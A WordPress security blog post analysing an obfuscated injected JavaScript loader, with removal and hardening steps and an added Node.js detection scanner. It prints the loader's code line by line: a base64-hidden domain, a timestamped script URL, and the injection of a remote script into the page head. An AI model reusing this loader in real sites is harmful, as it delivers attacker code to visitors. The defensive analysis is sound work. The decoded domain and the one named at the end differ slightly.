Beware of the Malicious Script in WordPress Websites

July 7, 2024


WordPress, being the most popular content management system (CMS), is a common target for cyberattacks. Recently, a malicious script that loads code from an external domain has been discovered on numerous WordPress websites. This article explains how the script works, the risks it poses, and steps to remove it and secure your site.

How the Malicious Script Works

The malicious script is designed to load a JavaScript file from an external domain. It dynamically constructs a URL based on the current timestamp, so the requested URL changes over time and the loaded script is always up-to-date. Here’s a breakdown of the script:


  • Calculate the timestamp:

    • var _0x2196a7 = Math['floor'](Date['now']() / 0x3e8): This gets the current timestamp in seconds.
    • _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10: This rounds down the timestamp to the nearest multiple of 3600 (0xe10 in hexadecimal).
  • Adjust the timestamp:

    • _0x2196a7 -= _0x2196a7 % 0x258: This rounds the timestamp down to a multiple of 600 (0x258 in hexadecimal), i.e. ten minutes.
    • _0x2196a7 = _0x2196a7['toString'](0x10): Converts the adjusted timestamp to a hexadecimal string.
  • Check the document referrer:

    • if (!document['referrer']) return;: If there is no referrer, the script terminates.
  • Decode the URL:

    • let _0x9cf45e = atob('Y3Jhe' + 'nkyY2Ru' + 'LmNvbQ==');: This joins the string fragments into the base64-encoded string 'Y3JhenkyY2RuLmNvbQ==' and decodes it to the domain name.
  • Create and append the script:

    • (_0x24b800 = _0x26d259['createElem' + 'ent']('script')): Creates a new script element.
    • ['type'] = 'text/javas' + 'cript': Sets the type attribute to ‘text/javascript’.
    • ['async'] = !0x0: Sets the async attribute to true.
    • ['src'] = 'https://' + _0x9cf45e + '/min.t.' + _0xcb1eb8 + '.js?v=' + _0x2196a7: Sets the src attribute to a URL constructed with the decoded domain, timestamp, and version.
    • _0x26d259['getElement' + 'sByTagName']('head')[0x0]['appendChil' + 'd'](_0x24b800);: Appends the script element to the head of the document.

Key Components:

  1. Timestamp Calculation: The script calculates a timestamp and rounds it down to the hour and to the ten-minute mark.
  2. URL Construction: It constructs a URL using the decoded domain and the calculated timestamp.
  3. Script Loading: The script element is created and appended to the document’s head, loading the external JavaScript file.

Potential Risks:

  • Malware Injection: The external script can inject malware or other malicious code into your website.
  • Data Theft: It can steal sensitive information from your site and its visitors.
  • SEO Poisoning: Malicious scripts can manipulate your site’s SEO to redirect traffic to harmful sites.

How to Detect and Remove the Malicious Script

Step 1: Locate the Script

  1. Theme Files: Check your theme files, especially header.php and footer.php.
  2. Custom Scripts: Look for custom scripts added to your site.

Step 2: Remove the Script

Simply delete the malicious script from your files.

Step 3: Scan for Other Malicious Code

  1. Security Plugins: Use security plugins like Wordfence, Sucuri, or iThemes Security to scan your site.
  2. Manual Review: Manually review other theme and plugin files for suspicious code.
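
A plain text search for the domain will not find this loader, because the domain is base64-encoded and both it and the DOM method names are split across string fragments. The following Node.js scanner is an added example, not code from the original article: it folds the fragments back together before matching. The names foldConcats, scanSource and HIDDEN_NAMES, the rule labels, and the sample input are assumptions made for illustration.

```javascript
// Added example (not from the article): heuristic scan for split-string loaders.

// Names the loader described above hides by splitting them across '+' joins.
const HIDDEN_NAMES = ['createElement', 'getElementsByTagName', 'appendChild', 'text/javascript'];

// Merge adjacent quoted literals joined by "+" until nothing changes,
// so 'Y3Jhe' + 'nkyY2Ru' becomes 'Y3JhenkyY2Ru'.
function foldConcats(src) {
  const pair = /(['"])([^'"\\\n]*)\1\s*\+\s*(['"])([^'"\\\n]*)\3/g;
  let prev;
  do {
    prev = src;
    src = src.replace(pair, (_m, _q1, a, _q2, b) => `'${a}${b}'`);
  } while (src !== prev);
  return src;
}

// Return findings for the contents of one file (PHP, HTML or JS text).
function scanSource(src) {
  const folded = foldConcats(src);
  const findings = [];
  // Rule 1: atob() of a literal that decodes to something shaped like a hostname.
  for (const m of folded.matchAll(/atob\(\s*['"]([A-Za-z0-9+\/]+={0,2})['"]\s*\)/g)) {
    const decoded = Buffer.from(m[1], 'base64').toString('latin1');
    if (/^[a-z0-9-]+(\.[a-z0-9-]+)*\.[a-z]{2,}$/i.test(decoded)) {
      findings.push({ rule: 'atob-hostname', value: decoded });
    }
  }
  // Rule 2: a DOM name that only appears once the concatenations are folded.
  for (const name of HIDDEN_NAMES) {
    if (folded.includes(name) && !src.includes(name)) {
      findings.push({ rule: 'split-string', value: name });
    }
  }
  return findings;
}

// Constructed sample: a theme header fragment built from the statements quoted above.
const SAMPLE = `<script>(function(){ var d = document;
if (!d['referrer']) return;
let h = atob('Y3Jhe' + 'nkyY2Ru' + 'LmNvbQ==');
var s = d['createElem' + 'ent']('script');
s['type'] = 'text/javas' + 'cript';
s['async'] = !0x0;
d['getElement' + 'sByTagName']('head')[0x0]['appendChil' + 'd'](s);
})();</script>`;

// Print each finding with dots defanged so the output is safe to paste into a ticket.
for (const f of scanSource(SAMPLE)) console.log(f.rule, f.value.replace(/\./g, '[.]'));
```

To use it on a site, read each theme and plugin file as text and pass the contents to scanSource; any finding marks a file to open and review by hand.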

Enhance Your Site’s Security

Change Passwords

  • Update passwords for your WordPress admin, database, hosting account, and other associated services.

Update WordPress

  • Ensure your WordPress core, themes, and plugins are up-to-date.

Use Security Plugins

  • Install security plugins to add layers of protection, such as firewall rules and malware scanning.

Harden WordPress

  • Follow WordPress hardening guidelines to secure your site.

Monitor for Changes

  • Set up monitoring to alert you of unauthorized changes.


The crazzycdn .com script is a significant security threat to WordPress websites. By following the steps outlined in this article, you can remove the malicious script and enhance your site’s security to prevent future attacks. Always stay vigilant and keep your site updated and secure.
